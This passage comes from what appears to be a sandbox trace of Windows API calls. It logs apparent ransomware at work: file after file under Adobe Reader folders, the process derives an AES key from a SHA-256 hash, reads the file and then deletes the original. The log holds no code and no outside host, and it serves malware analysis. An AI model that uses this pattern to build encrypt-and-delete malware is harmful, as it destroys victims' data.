lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7288 [0224.335] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.408] CryptDestroyHash (hHash=0x284d568) returned 1 [0224.408] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.408] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.410] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.tr.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.tr.txt")) returned 1 [0224.411] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0224.412] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0224.412] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.412] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0224.412] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7288 [0224.412] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.424] CryptDestroyHash (hHash=0x284d768) returned 1 [0224.424] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.424] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.426] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.tr_TR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.tr_tr.txt")) returned 1 [0224.428] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0224.428] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0224.428] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.428] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0224.428] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x724e [0224.428] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.438] CryptDestroyHash (hHash=0x284d568) returned 1 [0224.438] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.438] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.439] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.uk.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.uk.txt")) returned 1 [0224.441] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0224.441] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0224.441] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.441] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0224.441] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x724e [0224.441] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.451] CryptDestroyHash (hHash=0x284d768) returned 1 [0224.451] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.451] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.452] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.uk_UA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.uk_ua.txt")) returned 1 [0224.454] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0224.454] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0224.454] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.454] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0224.454] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6068 [0224.454] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.564] CryptDestroyHash (hHash=0x284d568) returned 1 [0224.564] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.564] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.566] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_CN.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_cn.txt")) returned 1 [0224.567] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0224.568] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0224.568] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.568] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0224.568] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x605a [0224.568] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.605] CryptDestroyHash (hHash=0x284d768) returned 1 [0224.605] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.605] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.607] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw.txt")) returned 1 [0224.608] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0224.609] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0224.609] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.609] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0224.609] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x608c [0224.609] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.612] CryptDestroyHash (hHash=0x284d568) returned 1 [0224.612] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.612] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.614] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW_STROKE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw_stroke.txt")) returned 1 [0224.616] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0224.616] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0224.616] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.616] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0224.616] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0224.616] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.617] CryptDestroyHash (hHash=0x284d768) returned 1 [0224.617] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.617] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.618] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\_HELP.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\_help.txt")) returned 1 [0224.620] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0224.620] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0224.621] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0224.625] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0224.626] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0224.626] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0224.627] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0224.627] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0224.645] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0224.646] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0224.646] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0224.646] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.647] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d5a8) returned 1 [0224.647] GetFileSize (in: hFile=0x6c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5f76c [0224.647] ReadFile (in: hFile=0x6c0, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0224.762] CryptDestroyHash (hHash=0x284d768) returned 1 [0224.762] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0224.762] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.763] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\HKSCS.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\hkscs.txt")) returned 1 [0224.767] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0224.768] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0224.768] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.768] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d5a8) returned 1 [0224.768] GetFileSize (in: hFile=0x6c4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3229c [0224.768] ReadFile (in: hFile=0x6c4, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0224.784] CryptDestroyHash (hHash=0x284d668) returned 1 [0224.784] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0224.784] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.786] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\Japanese83pv.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\japanese83pv.txt")) returned 1 [0224.788] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0224.789] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0224.789] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.789] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d5a8) returned 1 [0224.789] GetFileSize (in: hFile=0x6c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x19ea7 [0224.789] ReadFile (in: hFile=0x6c0, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0224.833] CryptDestroyHash (hHash=0x284d768) returned 1 [0224.834] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0224.834] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.835] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0208.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0208.txt")) returned 1 [0224.837] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0224.837] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0224.837] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.837] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d5a8) returned 1 [0224.837] GetFileSize (in: hFile=0x6c4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x29ed0 [0224.837] ReadFile (in: hFile=0x6c4, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0224.847] CryptDestroyHash (hHash=0x284d668) returned 1 [0224.847] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0224.847] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.848] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0213.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0213.txt")) returned 1 [0224.850] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0224.851] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0224.851] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.851] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d5a8) returned 1 [0224.851] GetFileSize (in: hFile=0x6c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x288d [0224.851] ReadFile (in: hFile=0x6c0, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0224.857] CryptDestroyHash (hHash=0x284d768) returned 1 [0224.857] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0224.857] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.858] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\symbol.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\symbol.txt")) returned 1 [0224.859] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0224.860] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0224.860] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.860] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d5a8) returned 1 [0224.860] GetFileSize (in: hFile=0x6c4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2e9c [0224.860] ReadFile (in: hFile=0x6c4, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0224.864] CryptDestroyHash (hHash=0x284d668) returned 1 [0224.864] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0224.864] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.865] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\zdingbat.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\zdingbat.txt")) returned 1 [0224.902] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0224.988] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0224.989] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.037] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.085] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0225.086] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0225.086] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0225.086] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0225.086] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x268000 [0225.086] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0225.466] CryptDestroyHash (hHash=0x284d528) returned 1 [0225.466] CryptDestroyKey (hKey=0x284d568) returned 1 [0225.466] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0225.467] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\AcroRead.msi" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\acroread.msi")) returned 0 [0225.468] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0225.468] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0225.468] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0225.469] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0225.469] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41c1 [0225.469] ReadFile (in: hFile=0x588, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0225.472] CryptDestroyHash (hHash=0x284d628) returned 1 [0225.472] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0225.472] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0225.473] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\vigtigt.htm")) returned 1 [0225.474] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0225.475] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0225.475] CryptHashData (hHash=0x284d728, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0225.475] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0225.475] GetFileSize (in: hFile=0x694, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41b2 [0225.475] ReadFile (in: hFile=0x694, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0225.486] CryptDestroyHash (hHash=0x284d728) returned 1 [0225.486] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0225.486] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0225.487] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktig.htm")) returned 1 [0225.488] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0225.489] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0225.489] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0225.489] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0225.489] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4214 [0225.489] ReadFile (in: hFile=0x588, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0225.503] CryptDestroyHash (hHash=0x284d628) returned 1 [0225.503] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0225.503] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0225.504] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktigt.htm")) returned 1 [0225.505] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.505] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.505] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0225.534] 